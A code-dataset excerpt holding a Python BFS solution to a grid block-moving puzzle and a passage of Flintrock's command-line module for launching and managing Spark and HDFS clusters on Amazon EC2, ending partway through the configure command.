seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40133363615 | from collections import deque
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
def nextspots(board, pos, n):
nextspots = []
pos = list(pos)
x1, y1, x2, y2 = pos[0][0], pos[0][1], pos[1][0], pos[1][1]
for i in range(4): # 상하좌우
nx1, ny1 = x1 + dx[i], y1 + dy[i]
nx2, ny2 = x2 + dx[i], y2 + dy[i]
if 0 <= nx1 < n and 0 <= nx2 < n and 0 <= ny1 < n and 0 <= ny2 < n:
if board[nx1][ny1] == 0 and board[nx2][ny2] == 0:
nextspots.append({(nx1, ny1), (nx2, ny2)})
if x1 == x2: # 가로 상태
for i in [-1, 1]:
if 0 <= x1+i < n and 0 <= x2+i < n:
if board[x1+i][y1] == 0 and board[x2+i][y2] == 0:
nextspots.append({(x1, y1), (x1+i, y1)})
nextspots.append({(x2, y2), (x2+i, y2)})
elif y1 == y2: # 세로 상태
for i in [-1, 1]:
if 0 <= y1+i < n and 0 <= y2+i < n:
if board[x1][y1+i] == 0 and board[x2][y2+i] == 0:
nextspots.append({(x1, y1), (x1, y1+i)})
nextspots.append({(x2, y2), (x2, y2+i)})
return nextspots
def solution(board):
queue = deque()
n = len(board)
visit = []
start = {(0,0), (0,1)}
queue.append((start, 0))
visit.append(start)
while queue:
pos, count = queue.popleft()
if (n-1, n-1) in pos:
return count
for nextspot in nextspots(board, pos, n):
if nextspot not in visit:
queue.append((nextspot, count+1))
visit.append(nextspot)
return 0 | Woojung0618/algorithmSolve | Programmers/Lv3/블록이동하기.py | 블록이동하기.py | py | 1,594 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 31,
"usage_type": "call"
}
] |
29123820566 | import os
import posixpath
import errno
import json
import resource
import sys
import shutil
import textwrap
import urllib.parse
import urllib.request
import warnings
import logging
# External modules
import click
import yaml
# We import botocore here so we can catch when the user tries to
# access AWS without having their credentials configured and provide
# a friendly error message. Apart from that, flintrock.py should
# not really know anything about EC2 or boto since that is delegated
# to ec2.py.
import botocore
# Flintrock modules
from . import ec2
from .exceptions import (
UsageError,
UnsupportedProviderError,
NothingToDo,
Error)
from flintrock import __version__
from .util import spark_hadoop_build_version
from .services import HDFS, Spark # TODO: Remove this dependency.
FROZEN = getattr(sys, 'frozen', False)
if FROZEN:
THIS_DIR = sys._MEIPASS
else:
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
logger = logging.getLogger('flintrock.flintrock')
def format_message(*, message: str, indent: int=4, wrap: int=70):
"""
Format a lengthy message for printing to screen.
"""
return textwrap.indent(
textwrap.fill(
textwrap.dedent(text=message),
width=wrap),
prefix=' ' * indent)
def option_name_to_variable_name(option: str):
"""
Convert an option name like `--ec2-user` to the Python name it gets mapped to,
like `ec2_user`.
"""
return option.replace('--', '', 1).replace('-', '_')
def variable_name_to_option_name(variable: str):
"""
Convert a variable name like `ec2_user` to the Click option name it gets mapped to,
like `--ec2-user`.
"""
return '--' + variable.replace('_', '-')
def option_requires(
*,
option: str,
conditional_value=None,
requires_all: list=[],
requires_any: list=[],
scope: dict):
"""
Raise an exception if an option's requirements are not met.
The option's requirements are checked only if the option has a "truthy" value
(i.e. it's not a "falsy" value like '', None, or False), and if its value is
equal to conditional_value, if conditional_value is not None.
requires_all: Every option in this list must be defined.
requires_any: At least one option in this list must be defined.
This function looks for values by converting the option names to their
corresponding variable names (e.g. --option-a becomes option_a) and looking them
up in the provided scope.
"""
option_value = scope[option_name_to_variable_name(option)]
if option_value and \
(conditional_value is None or option_value == conditional_value):
if requires_all:
for required_option in requires_all:
required_name = option_name_to_variable_name(required_option)
if required_name not in scope or not scope[required_name]:
raise UsageError(
"Error: Missing option \"{missing_option}\" is required by "
"\"{option}{space}{conditional_value}\"."
.format(
missing_option=required_option,
option=option,
space=' ' if conditional_value is not None else '',
conditional_value=conditional_value if conditional_value is not None else ''))
if requires_any:
for required_option in requires_any:
required_name = option_name_to_variable_name(required_option)
if required_name in scope and scope[required_name] is not None:
break
else:
raise UsageError(
"Error: \"{option}{space}{conditional_value}\" requires at least "
"one of the following options to be set: {at_least}"
.format(
option=option,
space=' ' if conditional_value is not None else '',
conditional_value=conditional_value if conditional_value is not None else '',
at_least=', '.join(['"' + ra + '"' for ra in requires_any])))
def mutually_exclusive(*, options: list, scope: dict):
"""
Raise an exception if more than one of the provided options is specified.
This function looks for values by converting the option names to their
corresponding variable names (e.g. --option-a becomes option_a) and looking them
up in the provided scope.
"""
mutually_exclusive_names = [option_name_to_variable_name(o) for o in options]
used_options = set()
for name, value in scope.items():
if name in mutually_exclusive_names and scope[name]: # is not None:
used_options.add(name)
if len(used_options) > 1:
bad_option1 = used_options.pop()
bad_option2 = used_options.pop()
raise UsageError(
"Error: \"{option1}\" and \"{option2}\" are mutually exclusive.\n"
" {option1}: {value1}\n"
" {option2}: {value2}"
.format(
option1=variable_name_to_option_name(bad_option1),
value1=scope[bad_option1],
option2=variable_name_to_option_name(bad_option2),
value2=scope[bad_option2]))
def get_config_file() -> str:
"""
Get the path to Flintrock's default configuration file.
"""
config_dir = click.get_app_dir(app_name='Flintrock')
config_file = os.path.join(config_dir, 'config.yaml')
return config_file
def configure_log(debug: bool):
root_logger = logging.getLogger('flintrock')
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
if debug:
root_logger.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter('%(asctime)s - flintrock.%(module)-9s - %(levelname)-5s - %(message)s'))
else:
root_logger.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter('%(message)s'))
root_logger.addHandler(handler)
def build_hdfs_download_url(ctx, param, value):
hdfs_version = ctx.params['hdfs_version']
if value.endswith('.gz') or value.endswith('.tgz'):
logger.warning(
"Hadoop download source appears to point to a file, not a directory. "
"Flintrock will not try to determine the correct file to download based on "
"the Hadoop version."
)
hdfs_download_url = value
else:
hdfs_download_url = (value.rstrip('/') + '/hadoop-{v}.tar.gz')
return hdfs_download_url.format(v=hdfs_version)
def build_spark_download_url(ctx, param, value):
spark_version = ctx.params['spark_version']
hadoop_version = ctx.params['hdfs_version']
hadoop_build_version = spark_hadoop_build_version(hadoop_version)
# Starting in Spark 3.3.0, the build artifact naming scheme changed a bit.
# Instead of 'hadoop3.2', for example, that part now reads 'hadoop3'.
if spark_version:
spark_version_tuple = tuple(map(int, spark_version.split('.')))
if spark_version_tuple >= (3, 3, 0):
hadoop_build_version = hadoop_build_version.split('.')[0]
if value.endswith('.gz') or value.endswith('.tgz'):
logger.warning(
"Spark download source appears to point to a file, not a directory. "
"Flintrock will not try to determine the correct file to download based on "
"the Spark and Hadoop versions."
)
spark_download_url = value
else:
spark_download_url = (value.rstrip('/') + '/spark-{v}-bin-{hv}.tgz')
return spark_download_url.format(
v=spark_version,
hv=hadoop_build_version,
)
def validate_download_source(url):
if 'spark' in url:
software = 'Spark'
elif 'hadoop' in url:
software = 'Hadoop'
else:
software = 'software'
parsed_url = urllib.parse.urlparse(url)
if parsed_url.netloc == 'www.apache.org' and parsed_url.path == '/dyn/closer.lua':
logger.warning(
"Warning: "
"Downloading {software} from an Apache mirror. Apache mirrors are "
"often slow and unreliable, and typically only serve the most recent releases. "
"We strongly recommend you specify a custom download source. "
"For more background on this issue, please see: https://github.com/nchammas/flintrock/issues/238"
.format(
software=software,
)
)
try:
urllib.request.urlopen(url)
except urllib.error.HTTPError as e:
raise Error(
"Error: Could not access {software} download. Maybe try a more recent release?\n"
" - Automatically redirected to: {url}\n"
" - HTTP error: {code}"
.format(
software=software,
url=e.url,
code=e.code,
)
)
@click.group()
@click.option(
'--config',
help="Path to a Flintrock configuration file.",
default=get_config_file())
@click.option('--provider', default='ec2', type=click.Choice(['ec2']))
@click.version_option(version=__version__)
# TODO: implement some solution like in https://github.com/pallets/click/issues/108
@click.option('--debug/--no-debug', default=False, help="Show debug information.")
@click.pass_context
def cli(cli_context, config, provider, debug):
"""
Flintrock
A command-line tool for launching Apache Spark clusters.
"""
cli_context.obj['provider'] = provider
if os.path.isfile(config):
with open(config) as f:
config_raw = yaml.safe_load(f)
debug = config_raw.get('debug') or debug
config_map = config_to_click(normalize_keys(config_raw))
cli_context.default_map = config_map
else:
if config != get_config_file():
raise FileNotFoundError(errno.ENOENT, 'No such file', config)
configure_log(debug=debug)
@cli.command()
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--java-version', type=click.IntRange(min=8), default=11)
@click.option('--install-hdfs/--no-install-hdfs', default=False)
@click.option('--hdfs-version', default='3.3.4')
@click.option('--hdfs-download-source',
help=(
"URL to download Hadoop from. If an S3 URL, Flintrock will use the "
"AWS CLI from the cluster nodes to download it. "
"Flintrock will append the appropriate file name to the end "
"of the URL based on the Apache release file names here: "
"https://dist.apache.org/repos/dist/release/hadoop/common/"
),
default='https://www.apache.org/dyn/closer.lua?action=download&filename=hadoop/common/hadoop-{v}/',
show_default=True,
callback=build_hdfs_download_url)
@click.option('--install-spark/--no-install-spark', default=True)
@click.option('--spark-executor-instances', default=1,
help="How many executor instances per worker.")
@click.option('--spark-version',
# Don't set a default here because it will conflict with
# the config file if the git commit is set.
# See: https://github.com/nchammas/flintrock/issues/190
# default=,
help="Spark release version to install.")
@click.option('--spark-download-source',
help=(
"URL to download Spark from. If an S3 URL, Flintrock will use the "
"AWS CLI from the cluster nodes to download it. "
"Flintrock will append the appropriate file "
"name to the end of the URL based on the selected Hadoop version and "
"Apache release file names here: "
"https://dist.apache.org/repos/dist/release/spark/"
),
default='https://www.apache.org/dyn/closer.lua?action=download&filename=spark/spark-{v}/',
show_default=True,
callback=build_spark_download_url)
@click.option('--spark-git-commit',
help="Git commit to build Spark from. "
"Set to 'latest' to build Spark from the latest commit on the "
"repository's default branch.")
@click.option('--spark-git-repository',
help="Git repository to clone Spark from.",
default='https://github.com/apache/spark',
show_default=True)
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-key-name')
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-instance-type', default='m5.medium', show_default=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
# We set some of these defaults to empty strings because of boto3's parameter validation.
# See: https://github.com/boto/boto3/issues/400
@click.option('--ec2-availability-zone', default='')
@click.option('--ec2-ami')
@click.option('--ec2-user')
@click.option('--ec2-security-group', 'ec2_security_groups',
multiple=True,
help="Additional security groups names to assign to the instances. "
"You can specify this option multiple times.")
@click.option('--ec2-spot-price', type=float)
@click.option('--ec2-spot-request-duration', default='7d',
help="Duration a spot request is valid (e.g. 3d 2h 1m).")
@click.option('--ec2-min-root-ebs-size-gb', type=int, default=30)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-subnet-id', default='')
@click.option('--ec2-instance-profile-name', default='')
@click.option('--ec2-placement-group', default='')
@click.option('--ec2-tenancy', default='default')
@click.option('--ec2-ebs-optimized/--no-ec2-ebs-optimized', default=False)
@click.option('--ec2-instance-initiated-shutdown-behavior', default='stop',
type=click.Choice(['stop', 'terminate']))
@click.option('--ec2-user-data',
type=click.File(mode='r', encoding='utf-8'),
help="Path to EC2 user data script that will run on instance launch.")
@click.option('--ec2-tag', 'ec2_tags',
callback=ec2.cli_validate_tags,
multiple=True,
help="Additional tags (e.g. 'Key,Value') to assign to the instances. "
"You can specify this option multiple times.")
@click.option('--ec2-authorize-access-from',
callback=ec2.cli_validate_ec2_authorize_access,
multiple=True,
help=(
"Authorize cluster access from a specific source (e.g. on a private "
"network). The source can be a) a plain IP address, b) an IP "
"address in CIDR notation, or c) an EC2 Security Group ID. "
"Using this option disables automatic detection of client's public IP "
"address."
))
@click.pass_context
def launch(
cli_context,
cluster_name,
num_slaves,
java_version,
install_hdfs,
hdfs_version,
hdfs_download_source,
install_spark,
spark_executor_instances,
spark_version,
spark_git_commit,
spark_git_repository,
spark_download_source,
assume_yes,
ec2_key_name,
ec2_identity_file,
ec2_instance_type,
ec2_region,
ec2_availability_zone,
ec2_ami,
ec2_user,
ec2_security_groups,
ec2_spot_price,
ec2_spot_request_duration,
ec2_min_root_ebs_size_gb,
ec2_vpc_id,
ec2_subnet_id,
ec2_instance_profile_name,
ec2_placement_group,
ec2_tenancy,
ec2_ebs_optimized,
ec2_instance_initiated_shutdown_behavior,
ec2_user_data,
ec2_tags,
ec2_authorize_access_from):
"""
Launch a new cluster.
"""
provider = cli_context.obj['provider']
services = []
option_requires(
option='--install-hdfs',
requires_all=['--hdfs-version'],
scope=locals())
option_requires(
option='--install-spark',
requires_any=[
'--spark-version',
'--spark-git-commit'],
scope=locals())
mutually_exclusive(
options=[
'--spark-version',
'--spark-git-commit'],
scope=locals())
option_requires(
option='--install-spark',
requires_all=[
'--hdfs-version'],
scope=locals())
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-key-name',
'--ec2-identity-file',
'--ec2-instance-type',
'--ec2-region',
'--ec2-ami',
'--ec2-user'],
scope=locals())
# The subnet is required for non-default VPCs because EC2 does not
# support user-defined default subnets.
# See: https://forums.aws.amazon.com/thread.jspa?messageID=707417
# https://github.com/mitchellh/packer/issues/1935#issuecomment-111235752
option_requires(
option='--ec2-vpc-id',
requires_all=['--ec2-subnet-id'],
scope=locals())
check_external_dependency('ssh-keygen')
if install_hdfs:
validate_download_source(hdfs_download_source)
hdfs = HDFS(
version=hdfs_version,
download_source=hdfs_download_source,
)
services += [hdfs]
if install_spark:
if spark_version:
validate_download_source(spark_download_source)
spark = Spark(
spark_executor_instances=spark_executor_instances,
version=spark_version,
hadoop_version=hdfs_version,
download_source=spark_download_source,
)
elif spark_git_commit:
logger.warning(
"Warning: Building Spark takes a long time. "
"e.g. 15-20 minutes on an m5.xlarge instance on EC2.")
if spark_git_commit == 'latest':
spark_git_commit = get_latest_commit(spark_git_repository)
logger.info("Building Spark at latest commit: {c}".format(c=spark_git_commit))
spark = Spark(
spark_executor_instances=spark_executor_instances,
git_commit=spark_git_commit,
git_repository=spark_git_repository,
hadoop_version=hdfs_version,
)
services += [spark]
if provider == 'ec2':
cluster = ec2.launch(
cluster_name=cluster_name,
num_slaves=num_slaves,
java_version=java_version,
services=services,
assume_yes=assume_yes,
key_name=ec2_key_name,
identity_file=ec2_identity_file,
instance_type=ec2_instance_type,
region=ec2_region,
availability_zone=ec2_availability_zone,
ami=ec2_ami,
user=ec2_user,
security_groups=ec2_security_groups,
spot_price=ec2_spot_price,
spot_request_duration=ec2_spot_request_duration,
min_root_ebs_size_gb=ec2_min_root_ebs_size_gb,
vpc_id=ec2_vpc_id,
subnet_id=ec2_subnet_id,
instance_profile_name=ec2_instance_profile_name,
placement_group=ec2_placement_group,
tenancy=ec2_tenancy,
ebs_optimized=ec2_ebs_optimized,
instance_initiated_shutdown_behavior=ec2_instance_initiated_shutdown_behavior,
user_data=ec2_user_data,
tags=ec2_tags,
ec2_authorize_access_from=ec2_authorize_access_from)
else:
raise UnsupportedProviderError(provider)
print("Cluster master: {}".format(cluster.master_host))
print("Login with: flintrock login {}".format(cluster.name))
def get_latest_commit(github_repository: str):
"""
Get the latest commit on the default branch of a repository hosted on GitHub.
"""
parsed_url = urllib.parse.urlparse(github_repository)
repo_domain, repo_path = parsed_url.netloc, parsed_url.path.strip('/')
if repo_domain != 'github.com':
raise UsageError(
"Error: Getting the latest commit is only supported "
"for repositories hosted on GitHub. "
"Provided repository domain was: {d}".format(d=repo_domain))
url = "https://api.github.com/repos/{rp}/commits".format(rp=repo_path)
try:
with urllib.request.urlopen(url) as response:
result = json.loads(response.read().decode('utf-8'))
return result[0]['sha']
except Exception as e:
raise Exception(
"Could not get latest commit for repository: {r}"
.format(r=repo_path)) from e
@cli.command()
@click.argument('cluster-name')
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.pass_context
def destroy(cli_context, cluster_name, assume_yes, ec2_region, ec2_vpc_id):
"""
Destroy a cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
if not assume_yes:
cluster.print()
click.confirm(
text="Are you sure you want to destroy this cluster?",
abort=True)
logger.info("Destroying {c}...".format(c=cluster.name))
cluster.destroy()
@cli.command()
@click.argument('cluster-name', required=False)
@click.option('--master-hostname-only', is_flag=True, default=False)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.pass_context
def describe(
cli_context,
cluster_name,
master_hostname_only,
ec2_region,
ec2_vpc_id):
"""
Describe an existing cluster.
Leave out the cluster name to find all Flintrock-managed clusters.
The output of this command is both human- and machine-friendly. Full cluster
descriptions are output in YAML.
"""
provider = cli_context.obj['provider']
search_area = ""
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if cluster_name:
cluster_names = [cluster_name]
else:
cluster_names = []
if provider == 'ec2':
search_area = "in region {r}".format(r=ec2_region)
clusters = ec2.get_clusters(
cluster_names=cluster_names,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
if cluster_name:
cluster = clusters[0]
if master_hostname_only:
logger.info(cluster.master_host)
else:
cluster.print()
else:
if master_hostname_only:
for cluster in sorted(clusters, key=lambda x: x.name):
logger.info("{}: {}".format(cluster.name, cluster.master_host))
else:
logger.info("Found {n} cluster{s}{space}{search_area}.".format(
n=len(clusters),
s='' if len(clusters) == 1 else 's',
space=' ' if search_area else '',
search_area=search_area))
if clusters:
logger.info('---')
for cluster in sorted(clusters, key=lambda x: x.name):
cluster.print()
# TODO: Provide different command or option for going straight to Spark Shell. (?)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
# TODO: Move identity-file to global, non-provider-specific option. (?)
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def login(cli_context, cluster_name, ec2_region, ec2_vpc_id, ec2_identity_file, ec2_user):
"""
Login to the master of an existing cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
check_external_dependency('ssh')
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
# TODO: Check that master up first and error out cleanly if not
# via ClusterInvalidState.
cluster.login(user=user, identity_file=identity_file)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
# TODO: Move identity-file to global, non-provider-specific option. (?)
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def start(cli_context, cluster_name, ec2_region, ec2_vpc_id, ec2_identity_file, ec2_user):
"""
Start an existing, stopped cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.start_check()
logger.info("Starting {c}...".format(c=cluster_name))
cluster.start(user=user, identity_file=identity_file)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.pass_context
def stop(cli_context, cluster_name, ec2_region, ec2_vpc_id, assume_yes):
"""
Stop an existing, running cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
cluster.stop_check()
if not assume_yes:
cluster.print()
click.confirm(
text="Are you sure you want to stop this cluster?",
abort=True)
logger.info("Stopping {c}...".format(c=cluster_name))
cluster.stop()
logger.info("{c} is now stopped.".format(c=cluster_name))
@cli.command(name='add-slaves')
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.option('--ec2-spot-price', type=float)
@click.option('--ec2-spot-request-duration', default='7d',
help="Duration a spot request is valid (e.g. 3d 2h 1m).")
@click.option('--ec2-min-root-ebs-size-gb', type=int, default=30)
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-tag', 'ec2_tags',
callback=ec2.cli_validate_tags,
multiple=True,
help="Additional tags (e.g. 'Key,Value') to assign to the instances. "
"You can specify this option multiple times.")
@click.pass_context
def add_slaves(
cli_context,
cluster_name,
num_slaves,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user,
ec2_spot_price,
ec2_spot_request_duration,
ec2_min_root_ebs_size_gb,
ec2_tags,
assume_yes):
"""
Add slaves to an existing cluster.
Flintrock will configure new slaves based on information queried
automatically from the master.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
provider_options = {
'min_root_ebs_size_gb': ec2_min_root_ebs_size_gb,
'spot_price': ec2_spot_price,
'spot_request_duration': ec2_spot_request_duration,
'tags': ec2_tags
}
else:
raise UnsupportedProviderError(provider)
if cluster.num_masters == 0:
raise Error(
"Cannot add slaves to cluster '{c}' since it does not "
"appear to have a master."
.format(
c=cluster_name))
cluster.load_manifest(
user=user,
identity_file=identity_file)
cluster.add_slaves_check()
if provider == 'ec2':
cluster.add_slaves(
user=user,
identity_file=identity_file,
num_slaves=num_slaves,
assume_yes=assume_yes,
**provider_options)
@cli.command(name='remove-slaves')
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-user')
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.pass_context
def remove_slaves(
cli_context,
cluster_name,
num_slaves,
ec2_region,
ec2_vpc_id,
ec2_user,
ec2_identity_file,
assume_yes):
"""
Remove slaves from an existing cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-user',
'--ec2-identity-file'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
if num_slaves > cluster.num_slaves:
logger.warning(
"Warning: Cluster has {c} slave{cs}. "
"You asked to remove {n} slave{ns}."
.format(
c=cluster.num_slaves,
cs='' if cluster.num_slaves == 1 else 's',
n=num_slaves,
ns='' if num_slaves == 1 else 's'))
num_slaves = cluster.num_slaves
if not assume_yes:
cluster.print()
click.confirm(
text=("Are you sure you want to remove {n} slave{s} from this cluster?"
.format(
n=num_slaves,
s='' if num_slaves == 1 else 's')),
abort=True)
logger.info("Removing {n} slave{s}..."
.format(
n=num_slaves,
s='' if num_slaves == 1 else 's'))
cluster.remove_slaves(
user=user,
identity_file=identity_file,
num_slaves=num_slaves)
@cli.command(name='run-command')
@click.argument('cluster-name')
@click.argument('command', nargs=-1)
@click.option('--master-only', help="Run on the master only.", is_flag=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def run_command(
cli_context,
cluster_name,
command,
master_only,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user):
"""
Run a shell command on a cluster.
Examples:
flintrock run-command my-cluster 'touch /tmp/flintrock'
flintrock run-command my-cluster -- yum install -y package
Flintrock will return a non-zero code if any of the cluster nodes raises an error
while running the command.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.run_command_check()
logger.info("Running command on {target}...".format(
target="master only" if master_only else "cluster"))
cluster.run_command(
command=command,
master_only=master_only,
user=user,
identity_file=identity_file)
@cli.command(name='copy-file')
@click.argument('cluster-name')
@click.argument('local_path', type=click.Path(exists=True, dir_okay=False))
@click.argument('remote_path', type=click.Path())
@click.option('--master-only', help="Copy to the master only.", is_flag=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.option('--assume-yes/--no-assume-yes', default=False, help="Prompt before large uploads.")
@click.pass_context
def copy_file(
cli_context,
cluster_name,
local_path,
remote_path,
master_only,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user,
assume_yes):
"""
Copy a local file up to a cluster.
This will copy the file to the same path on each node of the cluster.
Examples:
flintrock copy-file my-cluster /tmp/file.102.txt /tmp/file.txt
flintrock copy-file my-cluster /tmp/spark-defaults.conf /tmp/
Flintrock will return a non-zero code if any of the cluster nodes raises an error.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
# We assume POSIX for the remote path since Flintrock
# only supports clusters running CentOS / Amazon Linux.
if not posixpath.basename(remote_path):
remote_path = posixpath.join(remote_path, os.path.basename(local_path))
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.copy_file_check()
if not assume_yes and not master_only:
file_size_bytes = os.path.getsize(local_path)
num_nodes = len(cluster.slave_ips) + 1 # TODO: cluster.num_nodes
total_size_bytes = file_size_bytes * num_nodes
if total_size_bytes > 10 ** 6:
logger.warning("WARNING:")
logger.warning(
format_message(
message="""\
You are trying to upload {total_size} bytes ({size} bytes x {count}
nodes in {cluster}). Depending on your upload bandwidth, this may take
a long time.
You may be better off uploading this file to a storage service like
Amazon S3 and downloading it from there to the cluster using
`flintrock run-command ...`.
""".format(
size=file_size_bytes,
count=num_nodes,
cluster=cluster_name,
total_size=total_size_bytes),
wrap=60))
click.confirm(
text="Are you sure you want to continue?",
default=True,
abort=True)
logger.info("Copying file to {target}...".format(
target="master only" if master_only else "cluster"))
cluster.copy_file(
local_path=local_path,
remote_path=remote_path,
master_only=master_only,
user=user,
identity_file=identity_file)
def normalize_keys(obj):
"""
Used to map keys from config files to Python parameter names.
"""
if type(obj) != dict:
return obj
else:
return {k.replace('-', '_'): normalize_keys(v) for k, v in obj.items()}
def config_to_click(config: dict) -> dict:
"""
Convert a dictionary of configurations loaded from a Flintrock config file
to a dictionary that Click can use to set default options.
"""
service_configs = {}
if 'services' in config:
for service in config['services']:
if config['services'][service]:
service_configs.update(
{service + '_' + k: v for (k, v) in config['services'][service].items()})
ec2_configs = {
'ec2_' + k: v for (k, v) in config['providers']['ec2'].items()}
click_map = {
'launch': dict(
list(config['launch'].items())
+ list(ec2_configs.items())
+ list(service_configs.items())),
'describe': ec2_configs,
'destroy': ec2_configs,
'login': ec2_configs,
'start': ec2_configs,
'stop': ec2_configs,
'add-slaves': ec2_configs,
'remove-slaves': ec2_configs,
'run-command': ec2_configs,
'copy-file': ec2_configs,
}
return click_map
@cli.command()
@click.option('--locate', is_flag=True, default=False,
help="Don't open an editor. "
"Just open the folder containing the configuration file.")
@click.pass_context
def configure(cli_context, locate):
"""
Configure Flintrock's defaults.
This will open Flintrock's configuration file in your default YAML editor so
you can set your defaults.
"""
config_file = get_config_file()
if not os.path.isfile(config_file):
logger.info("Initializing config file from template...")
